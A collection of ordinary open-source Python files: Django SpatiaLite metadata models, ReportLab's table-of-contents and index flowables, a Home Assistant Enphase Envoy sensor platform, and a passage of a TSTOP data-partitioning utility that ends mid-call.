class SpatialiteGeometryColumns(models.Model):
    """
    The 'geometry_columns' table from SpatiaLite.

    Unmanaged model (managed = False): it maps onto a metadata table that
    SpatiaLite itself creates and maintains.
    """
    f_table_name = models.CharField(max_length=256)
    f_geometry_column = models.CharField(max_length=256)
    coord_dimension = models.IntegerField()
    srid = models.IntegerField(primary_key=True)
    spatial_index_enabled = models.IntegerField()
    class Meta:
        app_label = 'gis'
        db_table = 'geometry_columns'
        managed = False
    @classmethod
    def table_name_col(cls):
        """
        Returns the name of the metadata column used to store the feature table
        name.
        """
        return 'f_table_name'
    @classmethod
    def geom_col_name(cls):
        """
        Returns the name of the metadata column used to store the feature
        geometry column.
        """
        return 'f_geometry_column'
    def __str__(self):
        # self.type is not declared above: it is attached dynamically by
        # add_spatial_version_related_fields() below, once the SpatiaLite
        # version is known (integer or string column depending on version).
        return "%s.%s - %dD %s field (SRID: %d)" % \
               (self.f_table_name, self.f_geometry_column,
                self.coord_dimension, self.type, self.srid)
class SpatialiteSpatialRefSys(models.Model, SpatialRefSysMixin):
    """
    The 'spatial_ref_sys' table from SpatiaLite.

    Unmanaged model mapping SpatiaLite's spatial reference system catalog.
    """
    srid = models.IntegerField(primary_key=True)
    auth_name = models.CharField(max_length=256)
    auth_srid = models.IntegerField()
    ref_sys_name = models.CharField(max_length=256)
    proj4text = models.CharField(max_length=2048)
    @property
    def wkt(self):
        # 'srtext' exists only on SpatiaLite >= 4; it is added dynamically by
        # add_spatial_version_related_fields() below.  Otherwise derive WKT
        # from the PROJ.4 string via GDAL.
        if hasattr(self, 'srtext'):
            return self.srtext
        from django.contrib.gis.gdal import SpatialReference
        return SpatialReference(self.proj4text).wkt
    class Meta:
        app_label = 'gis'
        db_table = 'spatial_ref_sys'
        managed = False
def add_spatial_version_related_fields(sender, **kwargs):
    """
    Adds fields after establishing a database connection to prevent database
    operations at compile time.

    Connected to the connection_created signal below; runs once per process.
    """
    # Signal.disconnect() returns True only if the receiver was still
    # connected, so the body executes exactly once even if several
    # connections are opened.
    if connection_created.disconnect(add_spatial_version_related_fields, sender=DatabaseWrapper):
        spatial_version = connection.ops.spatial_version[0]
        if spatial_version >= 4:
            # SpatiaLite >= 4 stores WKT directly and uses an integer
            # geometry-type code.
            SpatialiteSpatialRefSys.add_to_class('srtext', models.CharField(max_length=2048))
            SpatialiteGeometryColumns.add_to_class('type', models.IntegerField(db_column='geometry_type'))
        else:
            SpatialiteGeometryColumns.add_to_class('type', models.CharField(max_length=30))
| bsd-3-clause |
yasoob/PythonRSSReader | venv/lib/python2.7/dist-packages/reportlab/platypus/tableofcontents.py | 1 | 20681 | #Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/tableofcontents.py
__version__=''' $Id$ '''
__doc__="""Experimental class to generate Tables of Contents easily
This module defines a single TableOfContents() class that can be used to
create automatically a table of tontents for Platypus documents like
this:
story = []
toc = TableOfContents()
story.append(toc)
# some heading paragraphs here...
doc = MyTemplate(path)
doc.multiBuild(story)
The data needed to create the table is a list of (level, text, pageNum)
triplets, plus some paragraph styles for each level of the table itself.
The triplets will usually be created in a document template's method
like afterFlowable(), making notification calls using the notify()
method with appropriate data like this:
(level, text, pageNum) = ...
self.notify('TOCEntry', (level, text, pageNum))
Optionally the list can contain four items in which case the last item
is a destination key which the entry should point to. A bookmark
with this key needs to be created first like this:
key = 'ch%s' % self.seq.nextf('chapter')
self.canv.bookmarkPage(key)
self.notify('TOCEntry', (level, text, pageNum, key))
As the table of contents need at least two passes over the Platypus
story which is why the moultiBuild0() method must be called.
The level<NUMBER>ParaStyle variables are the paragraph styles used
to format the entries in the table of contents. Their indentation
is calculated like this: each entry starts at a multiple of some
constant named delta. If one entry spans more than one line, all
lines after the first are indented by the same constant named
epsilon.
"""
from reportlab.lib import enums
from reportlab.lib.units import cm
from reportlab.lib.utils import commasplit, escapeOnce, encode_label, decode_label
from reportlab.lib.styles import ParagraphStyle, _baseFontName
from reportlab.platypus.paragraph import Paragraph
from reportlab.platypus.doctemplate import IndexingFlowable
from reportlab.platypus.tables import TableStyle, Table
from reportlab.platypus.flowables import Spacer, Flowable
from reportlab.pdfbase.pdfmetrics import stringWidth
from reportlab.pdfgen import canvas
def unquote(txt):
    """Undo XML escaping in txt.

    xml.sax.saxutils.unescape handles &amp;, &lt; and &gt; by itself; the
    extra mapping restores the quote entities &apos; and &quot; as well.
    """
    from xml.sax.saxutils import unescape
    quote_entities = {"&apos;": "'", "&quot;": '"'}
    return unescape(txt, quote_entities)
# Compatibility shim: supply a minimal set type on ancient interpreters
# where the builtin does not exist (pre-Python 2.4).  Only .add() is
# emulated, which is all this module uses (see SimpleIndex.addEntry).
try:
    set
except:
    class set(list):
        def add(self,x):
            # preserve uniqueness like a real set; order is insertion order
            if x not in self:
                list.append(self,x)
def drawPageNumbers(canvas, style, pages, availWidth, availHeight, dot=' . '):
    '''
    Draws pagestr on the canvas using the given style.
    If dot is None, pagestr is drawn at the current position in the canvas.
    If dot is a string, pagestr is drawn right-aligned. If the string is not empty,
    the gap is filled with it.

    pages is a list of (pageNumber, destinationKey) pairs; it is sorted
    IN PLACE as a side effect.  Entries with a truthy key also get a
    clickable link rectangle over their page number.
    '''
    pages.sort()
    pagestr = ', '.join([str(p) for p, _ in pages])
    # NOTE(review): _curr_tx_info is a private canvas attribute set during
    # text drawing (see its use in SimpleIndex.__call__) -- assumes this
    # callback fires while a text object is active.
    x, y = canvas._curr_tx_info['cur_x'], canvas._curr_tx_info['cur_y']
    fontSize = style.fontSize
    pagestrw = stringWidth(pagestr, style.fontName, fontSize)
    #if it's too long to fit, we need to shrink to fit in 10% increments.
    #it would be very hard to output multiline entries.
    #however, we impose a minimum size of 1 point as we don't want an
    #infinite loop. Ultimately we should allow a TOC entry to spill
    #over onto a second line if needed.
    freeWidth = availWidth-x
    while pagestrw > freeWidth and fontSize >= 1.0:
        fontSize = 0.9 * fontSize
        pagestrw = stringWidth(pagestr, style.fontName, fontSize)
    if isinstance(dot, str):
        if dot:
            # number of dot repetitions that fit in the remaining gap
            dotw = stringWidth(dot, style.fontName, fontSize)
            dotsn = int((availWidth-x-pagestrw)/dotw)
        else:
            dotsn = dotw = 0
        text = '%s%s' % (dotsn * dot, pagestr)
        newx = availWidth - dotsn*dotw - pagestrw
        pagex = availWidth - pagestrw
    elif dot is None:
        # inline style: page numbers follow the current text position
        text = ', ' + pagestr
        newx = x
        pagex = newx
    else:
        raise TypeError('Argument dot should either be None or an instance of basestring.')
    tx = canvas.beginText(newx, y)
    tx.setFont(style.fontName, fontSize)
    tx.setFillColor(style.textColor)
    tx.textLine(text)
    canvas.drawText(tx)
    commaw = stringWidth(', ', style.fontName, fontSize)
    # lay an internal-link hotspot over each keyed page number
    for p, key in pages:
        if not key:
            continue
        w = stringWidth(str(p), style.fontName, fontSize)
        canvas.linkRect('', key, (pagex, y, pagex+w, y+style.leading), relative=1)
        pagex += w + commaw
# Default paragraph styles for tables of contents.
# (This could also be generated automatically or even
# on-demand if it is not known how many levels the
# TOC will finally need to display...)
# delta: extra left indent added per TOC level (see getLevelStyle);
# epsilon: indent for continuation lines of a wrapped entry.
delta = 1*cm
epsilon = 0.5*cm
defaultLevelStyles = [
    ParagraphStyle(
        name='Level 0',
        fontName=_baseFontName,
        fontSize=10,
        leading=11,
        firstLineIndent = 0,
        leftIndent = epsilon)]
# zero-padding table style shared by TableOfContents and SimpleIndex
defaultTableStyle = \
    TableStyle([
        ('VALIGN', (0,0), (-1,-1), 'TOP'),
        ('RIGHTPADDING', (0,0), (-1,-1), 0),
        ('LEFTPADDING', (0,0), (-1,-1), 0),
    ])
class TableOfContents(IndexingFlowable):
    """This creates a formatted table of contents.
    It presumes a correct block of data is passed in.
    The data block contains a list of (level, text, pageNumber)
    triplets.  You can supply a paragraph style for each level
    (starting at zero).
    Set dotsMinLevel to determine from which level on a line of
    dots should be drawn between the text and the page number.
    If dotsMinLevel is set to a negative value, no dotted lines are drawn.
    """
    def __init__(self):
        self.rightColumnWidth = 72
        self.levelStyles = defaultLevelStyles
        self.tableStyle = defaultTableStyle
        self.dotsMinLevel = 1
        self._table = None
        self._entries = []
        self._lastEntries = []
    def beforeBuild(self):
        # keep track of the last run
        self._lastEntries = self._entries[:]
        self.clearEntries()
    def isIndexing(self):
        return 1
    def isSatisfied(self):
        # the document is stable once two consecutive passes agree
        return (self._entries == self._lastEntries)
    def notify(self, kind, stuff):
        """The notification hook called to register all kinds of events.
        Here we are interested in 'TOCEntry' events only.
        """
        if kind == 'TOCEntry':
            self.addEntry(*stuff)
    def clearEntries(self):
        self._entries = []
    def getLevelStyle(self, n):
        '''Returns the style for level n, generating and caching styles on demand if not present.'''
        try:
            return self.levelStyles[n]
        except IndexError:
            # derive the missing style from level n-1, indented by delta
            prevstyle = self.getLevelStyle(n-1)
            self.levelStyles.append(ParagraphStyle(
                name='%s-%d-indented' % (prevstyle.name, n),
                parent=prevstyle,
                firstLineIndent = prevstyle.firstLineIndent+delta,
                leftIndent = prevstyle.leftIndent+delta))
            return self.levelStyles[n]
    def addEntry(self, level, text, pageNum, key=None):
        """Adds one entry to the table of contents.
        This allows incremental buildup by a doctemplate.
        Requires that enough styles are defined."""
        assert type(level) == type(1), "Level must be an integer"
        self._entries.append((level, text, pageNum, key))
    def addEntries(self, listOfEntries):
        """Bulk creation of entries in the table of contents.
        If you knew the titles but not the page numbers, you could
        supply them to get sensible output on the first run."""
        for entryargs in listOfEntries:
            self.addEntry(*entryargs)
    def wrap(self, availWidth, availHeight):
        "All table properties should be known by now."
        # makes an internal table which does all the work.
        # we draw the LAST RUN's entries! If there are
        # none, we make some dummy data to keep the table
        # from complaining
        if len(self._lastEntries) == 0:
            _tempEntries = [(0,'Placeholder for table of contents',0,None)]
        else:
            _tempEntries = self._lastEntries
        def drawTOCEntryEnd(canvas, kind, label):
            '''Callback to draw dots and page numbers after each entry.'''
            label = label.split(',')
            # NOTE(review): label[2] is eval'd (with empty globals) to turn
            # the repr of the key back into a value; keys must therefore
            # repr() to an eval-able literal with no raw commas.
            page, level, key = int(label[0]), int(label[1]), eval(label[2],{})
            style = self.getLevelStyle(level)
            if self.dotsMinLevel >= 0 and level >= self.dotsMinLevel:
                dot = ' . '
            else:
                dot = ''
            drawPageNumbers(canvas, style, [(page, key)], availWidth, availHeight, dot)
        self.canv.drawTOCEntryEnd = drawTOCEntryEnd
        tableData = []
        for (level, text, pageNum, key) in _tempEntries:
            style = self.getLevelStyle(level)
            if key:
                text = '<a href="#%s">%s</a>' % (key, text)
                # Escape characters that would break the comma-separated
                # onDraw label.  NOTE(review): '"' is mapped to '\\x2c'
                # (the comma escape) rather than '\\x22' -- looks
                # suspicious; confirm against upstream before changing.
                keyVal = repr(key).replace(',','\\x2c').replace('"','\\x2c')
            else:
                keyVal = None
            para = Paragraph('%s<onDraw name="drawTOCEntryEnd" label="%d,%d,%s"/>' % (text, pageNum, level, keyVal), style)
            if style.spaceBefore:
                tableData.append([Spacer(1, style.spaceBefore),])
            tableData.append([para,])
        self._table = Table(tableData, colWidths=(availWidth,), style=self.tableStyle)
        self.width, self.height = self._table.wrapOn(self.canv,availWidth, availHeight)
        return (self.width, self.height)
    def split(self, availWidth, availHeight):
        """At this stage we do not care about splitting the entries,
        we will just return a list of platypus tables. Presumably the
        calling app has a pointer to the original TableOfContents object;
        Platypus just sees tables.
        """
        return self._table.splitOn(self.canv,availWidth, availHeight)
    def drawOn(self, canvas, x, y, _sW=0):
        """Don't do this at home! The standard calls for implementing
        draw(); we are hooking this in order to delegate ALL the drawing
        work to the embedded table object.
        """
        self._table.drawOn(canvas, x, y, _sW)
def makeTuple(x):
    """Coerce x to a tuple.

    Iterables are converted with tuple(); anything else is wrapped in a
    1-tuple.  Strings and bytes are treated as scalars, not character
    sequences: under Python 3 str has __iter__, so without the explicit
    check an index term like "Spam" would be exploded into
    ('S','p','a','m') -- see SimpleIndex.addEntry, which calls this on
    raw text.  (Python 2 str/unicode lack __iter__, so this check only
    makes the Python 2 behavior explicit.)
    """
    if isinstance(x, (str, bytes)):
        return (x,)
    if hasattr(x, '__iter__'):
        return tuple(x)
    return (x,)
class SimpleIndex(IndexingFlowable):
    """Creates multi level indexes.
    The styling can be cutomized and alphabetic headers turned on and off.
    """
    def __init__(self, **kwargs):
        """
        Constructor of SimpleIndex.
        Accepts the same arguments as the setup method.
        """
        #keep stuff in a dictionary while building
        self._entries = {}
        self._lastEntries = {}
        self._flowable = None
        self.setup(**kwargs)
    def getFormatFunc(self,format):
        # Resolve a page-number formatter (_format_123, _format_I, ...)
        # from reportlab.lib.sequencer by name via a dynamic import.
        try:
            D = {}
            exec('from reportlab.lib.sequencer import _format_%s as formatFunc' % format, D)
            return D['formatFunc']
        except ImportError:
            raise ValueError('Unknown format %r' % format)
    def setup(self, style=None, dot=None, tableStyle=None, headers=True, name=None, format='123', offset=0):
        """
        This method makes it possible to change styling and other parameters on an existing object.
        style is the paragraph style to use for index entries.
        dot can either be None or a string. If it's None, entries are immediatly followed by their
        corresponding page numbers. If it's a string, page numbers are aligned on the right side
        of the document and the gap filled with a repeating sequence of the string.
        tableStyle is the style used by the table which the index uses to draw itself. Use this to
        change properties like spacing between elements.
        headers is a boolean. If it is True, alphabetic headers are displayed in the Index when the first
        letter changes. If False, we just output some extra space before the next item
        name makes it possible to use several indexes in one document. If you want this use this
        parameter to give each index a unique name. You can then index a term by refering to the
        name of the index which it should appear in:
        <index item="term" name="myindex" />
        format can be 'I', 'i', '123', 'ABC', 'abc'
        """
        if style is None:
            style = ParagraphStyle(name='index',
                                   fontName=_baseFontName,
                                   fontSize=11)
        self.textStyle = style
        self.tableStyle = tableStyle or defaultTableStyle
        self.dot = dot
        self.headers = headers
        if name is None:
            from reportlab.platypus.paraparser import DEFAULT_INDEX_NAME as name
        self.name = name
        self.formatFunc = self.getFormatFunc(format)
        self.offset = offset
    def __call__(self,canv,kind,label):
        # onDraw callback: registers a bookmark at the current text position
        # and records (terms, formatted page number, bookmark key).
        try:
            terms, format, offset = decode_label(label)
        except:
            # label was not an encoded triple; treat it as the raw term text
            terms = label
            format = offset = None
        if format is None:
            formatFunc = self.formatFunc
        else:
            formatFunc = self.getFormatFunc(format)
        if offset is None:
            offset = self.offset
        terms = commasplit(terms)
        pns = formatFunc(canv.getPageNumber()-offset)
        key = 'ix_%s_%s_p_%s' % (self.name, label, pns)
        info = canv._curr_tx_info
        canv.bookmarkHorizontal(key, info['cur_x'], info['cur_y'] + info['leading'])
        self.addEntry(terms, pns, key)
    def getCanvasMaker(self, canvasmaker=canvas.Canvas):
        # Wrap a canvas factory so every canvas it produces carries this
        # index as an attribute named self.name.
        def newcanvasmaker(*args, **kwargs):
            from reportlab.pdfgen import canvas
            c = canvasmaker(*args, **kwargs)
            setattr(c,self.name,self)
            return c
        return newcanvasmaker
    def isIndexing(self):
        return 1
    def isSatisfied(self):
        # stable once two consecutive build passes collected the same entries
        return (self._entries == self._lastEntries)
    def beforeBuild(self):
        # keep track of the last run
        self._lastEntries = self._entries.copy()
        self.clearEntries()
    def clearEntries(self):
        self._entries = {}
    def notify(self, kind, stuff):
        """The notification hook called to register all kinds of events.
        Here we are interested in 'IndexEntry' events only.
        """
        if kind == 'IndexEntry':
            (text, pageNum) = stuff
            self.addEntry(text, pageNum)
    def addEntry(self, text, pageNum, key=None):
        """Allows incremental buildup"""
        self._entries.setdefault(makeTuple(text),set([])).add((pageNum, key))
    def split(self, availWidth, availHeight):
        """At this stage we do not care about splitting the entries,
        we will just return a list of platypus tables. Presumably the
        calling app has a pointer to the original TableOfContents object;
        Platypus just sees tables.
        """
        return self._flowable.splitOn(self.canv,availWidth, availHeight)
    def _getlastEntries(self, dummy=[(['Placeholder for index'],enumerate((None,)*3))]):
        '''Return the last run's entries! If there are none, returns dummy.'''
        # NOTE: 'dummy' is a mutable default but is only ever read, never
        # mutated, so the usual shared-default pitfall does not apply here.
        if not self._lastEntries:
            if self._entries:
                return list(self._entries.items())
            return dummy
        return list(self._lastEntries.items())
    def _build(self,availWidth,availHeight):
        _tempEntries = self._getlastEntries()
        def getkey(seq):
            # case-insensitive sort on the term tuple
            return [x.upper() for x in seq[0]]
        _tempEntries.sort(key=getkey)
        # reserve level 0 for the alphabetic header row when headers are on
        leveloffset = self.headers and 1 or 0
        def drawIndexEntryEnd(canvas, kind, label):
            '''Callback to draw dots and page numbers after each entry.'''
            style = self.getLevelStyle(leveloffset)
            pages = decode_label(label)
            drawPageNumbers(canvas, style, pages, availWidth, availHeight, self.dot)
        self.canv.drawIndexEntryEnd = drawIndexEntryEnd
        alpha = ''
        tableData = []
        lastTexts = []
        alphaStyle = self.getLevelStyle(0)
        for texts, pageNumbers in _tempEntries:
            texts = list(texts)
            #track when the first character changes; either output some extra
            #space, or the first letter on a row of its own. We cannot do
            #widow/orphan control, sadly.
            nalpha = texts[0][0].upper()
            if alpha != nalpha:
                alpha = nalpha
                if self.headers:
                    header = alpha
                else:
                    header = ' '
                tableData.append([Spacer(1, alphaStyle.spaceBefore),])
                tableData.append([Paragraph(header, alphaStyle),])
                tableData.append([Spacer(1, alphaStyle.spaceAfter),])
            # only emit the sub-terms that differ from the previous entry
            i, diff = listdiff(lastTexts, texts)
            if diff:
                lastTexts = texts
                texts = texts[i:]
            label = encode_label(list(pageNumbers))
            texts[-1] = '%s<onDraw name="drawIndexEntryEnd" label="%s"/>' % (texts[-1], label)
            for text in texts:
                #Platypus and RML differ on how parsed XML attributes are escaped.
                #e.g. <index item="M&S"/>. The only place this seems to bite us is in
                #the index entries so work around it here.
                text = escapeOnce(text)
                style = self.getLevelStyle(i+leveloffset)
                para = Paragraph(text, style)
                if style.spaceBefore:
                    tableData.append([Spacer(1, style.spaceBefore),])
                tableData.append([para,])
                i += 1
        self._flowable = Table(tableData, colWidths=[availWidth], style=self.tableStyle)
    def wrap(self, availWidth, availHeight):
        "All table properties should be known by now."
        self._build(availWidth,availHeight)
        self.width, self.height = self._flowable.wrapOn(self.canv,availWidth, availHeight)
        return self.width, self.height
    def drawOn(self, canvas, x, y, _sW=0):
        """Don't do this at home! The standard calls for implementing
        draw(); we are hooking this in order to delegate ALL the drawing
        work to the embedded table object.
        """
        self._flowable.drawOn(canvas, x, y, _sW)
    def draw(self):
        # temporarily lend our canvas to the inner table if it has none
        t = self._flowable
        ocanv = getattr(t,'canv',None)
        if not ocanv:
            t.canv = self.canv
        try:
            t.draw()
        finally:
            if not ocanv:
                del t.canv
    def getLevelStyle(self, n):
        '''Returns the style for level n, generating and caching styles on demand if not present.'''
        if not hasattr(self.textStyle, '__iter__'):
            self.textStyle = [self.textStyle]
        try:
            return self.textStyle[n]
        except IndexError:
            # derive the missing style from level n-1, indented a bit more
            self.textStyle = list(self.textStyle)
            prevstyle = self.getLevelStyle(n-1)
            self.textStyle.append(ParagraphStyle(
                name='%s-%d-indented' % (prevstyle.name, n),
                parent=prevstyle,
                firstLineIndent = prevstyle.firstLineIndent+.2*cm,
                leftIndent = prevstyle.leftIndent+.2*cm))
            return self.textStyle[n]
AlphabeticIndex = SimpleIndex
def listdiff(l1, l2):
    """Return (i, tail): i is the length of the common prefix of l1 and
    l2, and tail is the remainder of l2 after that prefix."""
    limit = min(len(l1), len(l2))
    index = 0
    while index < limit and l1[index] == l2[index]:
        index += 1
    return index, l2[index:]
class ReferenceText(IndexingFlowable):
    """Fakery to illustrate how a reference would work if we could
    put it in a paragraph.

    textPattern is a %-format string with one slot for the page number of
    the flowable bookmarked under targetKey; the number from the PREVIOUS
    build pass is substituted, so at least two passes are needed.
    """
    def __init__(self, textPattern, targetKey):
        self.textPattern = textPattern
        self.target = targetKey
        self.paraStyle = ParagraphStyle('tmp')
        self._lastPageNum = None
        # sentinel page number until a 'Target' notification arrives
        self._pageNum = -999
        self._para = None
    def beforeBuild(self):
        # remember the page number seen on the previous pass
        self._lastPageNum = self._pageNum
    def notify(self, kind, stuff):
        if kind == 'Target':
            (key, pageNum) = stuff
            if key == self.target:
                self._pageNum = pageNum
    def wrap(self, availWidth, availHeight):
        text = self.textPattern % self._lastPageNum
        self._para = Paragraph(text, self.paraStyle)
        return self._para.wrap(availWidth, availHeight)
    def drawOn(self, canvas, x, y, _sW=0):
        self._para.drawOn(canvas, x, y, _sW)
| mit |
mKeRix/home-assistant | homeassistant/components/enphase_envoy/sensor.py | 15 | 5480 | """Support for Enphase Envoy solar energy monitor."""
import logging
from envoy_reader.envoy_reader import EnvoyReader
import requests
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_IP_ADDRESS,
CONF_MONITORED_CONDITIONS,
CONF_NAME,
CONF_PASSWORD,
CONF_USERNAME,
ENERGY_WATT_HOUR,
POWER_WATT,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
# Map of supported sensor condition -> (friendly name, unit).
# "inverters" is special-cased in async_setup_platform and Envoy.async_update:
# it fans out into one entity per inverter serial number.
SENSORS = {
    "production": ("Envoy Current Energy Production", POWER_WATT),
    "daily_production": ("Envoy Today's Energy Production", ENERGY_WATT_HOUR),
    "seven_days_production": (
        "Envoy Last Seven Days Energy Production",
        ENERGY_WATT_HOUR,
    ),
    "lifetime_production": ("Envoy Lifetime Energy Production", ENERGY_WATT_HOUR),
    "consumption": ("Envoy Current Energy Consumption", POWER_WATT),
    "daily_consumption": ("Envoy Today's Energy Consumption", ENERGY_WATT_HOUR),
    "seven_days_consumption": (
        "Envoy Last Seven Days Energy Consumption",
        ENERGY_WATT_HOUR,
    ),
    "lifetime_consumption": ("Envoy Lifetime Energy Consumption", ENERGY_WATT_HOUR),
    "inverters": ("Envoy Inverter", POWER_WATT),
}
ICON = "mdi:flash"
CONST_DEFAULT_HOST = "envoy"
# YAML configuration schema; all sensors are monitored by default.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Optional(CONF_IP_ADDRESS, default=CONST_DEFAULT_HOST): cv.string,
        vol.Optional(CONF_USERNAME, default="envoy"): cv.string,
        vol.Optional(CONF_PASSWORD, default=""): cv.string,
        vol.Optional(CONF_MONITORED_CONDITIONS, default=list(SENSORS)): vol.All(
            cv.ensure_list, [vol.In(list(SENSORS))]
        ),
        vol.Optional(CONF_NAME, default=""): cv.string,
    }
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
    """Set up the Enphase Envoy sensor."""
    ip_address = config[CONF_IP_ADDRESS]
    monitored_conditions = config[CONF_MONITORED_CONDITIONS]
    name = config[CONF_NAME]
    username = config[CONF_USERNAME]
    password = config[CONF_PASSWORD]
    envoy_reader = EnvoyReader(ip_address, username, password)
    entities = []
    # Iterate through the list of sensors
    for condition in monitored_conditions:
        if condition == "inverters":
            try:
                inverters = await envoy_reader.inverters_production()
            except requests.exceptions.HTTPError:
                # skip inverter entities entirely if auth fails at setup
                _LOGGER.warning(
                    "Authentication for Inverter data failed during setup: %s",
                    ip_address,
                )
                continue
            # One entity per inverter serial number; the serial is embedded
            # in the entity name and parsed back out in Envoy.async_update().
            if isinstance(inverters, dict):
                for inverter in inverters:
                    entities.append(
                        Envoy(
                            envoy_reader,
                            condition,
                            f"{name}{SENSORS[condition][0]} {inverter}",
                            SENSORS[condition][1],
                        )
                    )
        else:
            entities.append(
                Envoy(
                    envoy_reader,
                    condition,
                    f"{name}{SENSORS[condition][0]}",
                    SENSORS[condition][1],
                )
            )
    async_add_entities(entities)
class Envoy(Entity):
    """Implementation of the Enphase Envoy sensors."""

    def __init__(self, envoy_reader, sensor_type, name, unit):
        """Initialize the sensor.

        sensor_type is a key of SENSORS; for "inverters" sensors the
        inverter serial number is embedded as the third word of *name*
        and recovered in async_update().
        """
        self._envoy_reader = envoy_reader
        self._type = sensor_type
        self._name = name
        self._unit_of_measurement = unit
        self._state = None
        self._last_reported = None

    @property
    def name(self):
        """Return the name of the sensor."""
        return self._name

    @property
    def state(self):
        """Return the state of the sensor."""
        return self._state

    @property
    def unit_of_measurement(self):
        """Return the unit of measurement of this entity, if any."""
        return self._unit_of_measurement

    @property
    def icon(self):
        """Icon to use in the frontend, if any."""
        return ICON

    @property
    def device_state_attributes(self):
        """Return the state attributes (last report time, inverters only)."""
        if self._type == "inverters":
            return {"last_reported": self._last_reported}
        return None

    async def async_update(self):
        """Get the energy production data from the Enphase Envoy."""
        if self._type != "inverters":
            # The reader exposes one coroutine per sensor type; a non-int
            # result is an error message from the reader.
            _state = await getattr(self._envoy_reader, self._type)()
            if isinstance(_state, int):
                self._state = _state
            else:
                _LOGGER.error(_state)
                self._state = None
        else:
            try:
                inverters = await self._envoy_reader.inverters_production()
            except requests.exceptions.HTTPError:
                _LOGGER.warning(
                    "Authentication for Inverter data failed during update: %s",
                    self._envoy_reader.host,
                )
                # BUG FIX: bail out here -- 'inverters' is unbound after the
                # exception, so falling through to the isinstance() check
                # below raised UnboundLocalError on every failed update.
                return
            if isinstance(inverters, dict):
                # serial number was embedded in the entity name at setup
                serial_number = self._name.split(" ")[2]
                self._state = inverters[serial_number][0]
                self._last_reported = inverters[serial_number][1]
            else:
                self._state = None
| mit |
gpersistence/tstop | python/persistence/PartitionData.py | 1 | 8153 | #TSTOP
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
import random
import os
import sys
import argparse
from math import ceil
import numpy
from sklearn.cross_validation import StratifiedKFold
from Datatypes.JSONObject import load_data, save_data
from Datatypes.Segments import SegmentInfo
from Datatypes.Configuration import Configuration
from Datatypes.TrainTestPartitions import TrainTestPartition, TrainTestPartitions
def PartitionData(segment_info, split, avoid_overlap=False, segment_size=0,
                  file_based=False, preserve_labels=False, override_preset=False, surpress_warning=False, seed=None) :
    '''
    Accepts a list of Datatype.Segments.SegmentInfo and a float between 0 and 1,
    and outputs a pair of lists of indices, (train, test) corresponding
    to a partition of the input list
    len(train) approximates split * len(segment_info)
    Intersection of train and test is an empty set
    Union of train and test is not guaranteed to be range(len(segment_info))
    Optional arguments:
    avoid_overlap omits entries in test that would have overlapping data with entries in train,
    as indicated by the range [segment_start:segment_start+segment_size]
    segment_size interacts with avoid_overlap, because only segment_start is contained in the
    SegmentInfo class
    NOTE: avoid_overlap and segment_size are accepted for interface
    compatibility but are not referenced anywhere in the body yet.
    file_based creates partitions where segments with the same filename for source data are
    in the same partition
    preserve_labels tries to split the populations of labels evenly
    override_preset ignores any preset per-segment 'learning' train/test assignment
    surpress_warning silences the warning about labels too sparse to split well
    seed, when not None, seeds the RNG so the partition is reproducible
    '''
    segment_count = len(segment_info)
    segment_range = range(segment_count)
    # If every segment already carries a preset train/test assignment and the
    # caller did not ask to override it, just split along those assignments.
    if not override_preset and all(s.learning is not None for s in segment_info) :
        return TrainTestPartition([i for i in segment_range if segment_info[i].learning == 'train'],
                                  [i for i in segment_range if segment_info[i].learning == 'test'], None)
    train_goal_len = int(ceil(segment_count * split))
    if preserve_labels :
        labels = [s.max_label() for s in segment_info]
        label_set = list(set(labels))
        label_count = [(l0,len([l for l in labels if l == l0])) for l0 in label_set]
        label_goal = [(str(l), int(round(c * split))) for (l,c) in label_count]
        for ((l0,g),(l1,c)) in zip(label_goal, label_count) :
            # BUGFIX: the original condition was
            #     (g == 0) or (g == c) and not surpress_warning
            # which, by operator precedence, printed the warning whenever
            # g == 0 regardless of surpress_warning.
            if ((g == 0) or (g == c)) and not surpress_warning :
                print("PartitionData warning: not enough entries (%d) of label %s to properly make a train / test split of ratio %s" % (c, l0, split))
        label_goal = dict(label_goal)
    train = []
    test = []
    if seed is not None :
        random.seed(seed)
    # Record RNG state so the caller can reproduce this exact shuffle.
    state = random.getstate()
    if file_based :
        # Keep all segments that came from the same source file together.
        files = list(set([s.filename for s in segment_info]))
        random.shuffle(files)
        for f in files :
            f_indices = [x for (x,y) in zip(segment_range, segment_info) if y.filename == f]
            if preserve_labels :
                f_labels = [str(labels[i]) for i in f_indices]
                # Put the whole file into train only if that does not
                # overshoot the per-label quota for any label it contains.
                extend_train = True
                for l in label_goal.keys() :
                    count = len([l0 for l0 in f_labels if l0 == l])
                    if count > label_goal[l] :
                        extend_train = False
                        break
                if extend_train :
                    train.extend(f_indices)
                    for l in label_goal.keys() :
                        count = len([l0 for l0 in f_labels if l0 == l])
                        label_goal[l] = label_goal[l] - count
                else :
                    test.extend(f_indices)
            else :
                if len(train) + len(f_indices) < train_goal_len :
                    train.extend(f_indices)
                else :
                    test.extend(f_indices)
    else :
        # NOTE: this module is Python 2 (bare print statements elsewhere in
        # the file), where range() returns a list and is shuffleable in place.
        random.shuffle(segment_range)
        if preserve_labels :
            for i in segment_range:
                l = str(labels[i])
                if label_goal[l] > 0 :
                    train.append(i)
                    label_goal[l] = label_goal[l] - 1
                else :
                    test.append(i)
        else :
            train = segment_range[0:train_goal_len]
            test = segment_range[train_goal_len:]
    return TrainTestPartition(train,test,state)
def generate_partitions(config, segment_info, cv_iterations=0, seed=None) :
    """Build the seeded main partition, optional stratified CV folds over its
    training half, and one fresh unseeded partition per learning iteration.
    """
    # Data sets whose segments must stay grouped by their source file.
    by_file = config.data_type in ("BirdSoundsSegments", "KitchenMocapSegments")
    partition = PartitionData(segment_info,
                              config.learning_split,
                              avoid_overlap=True,
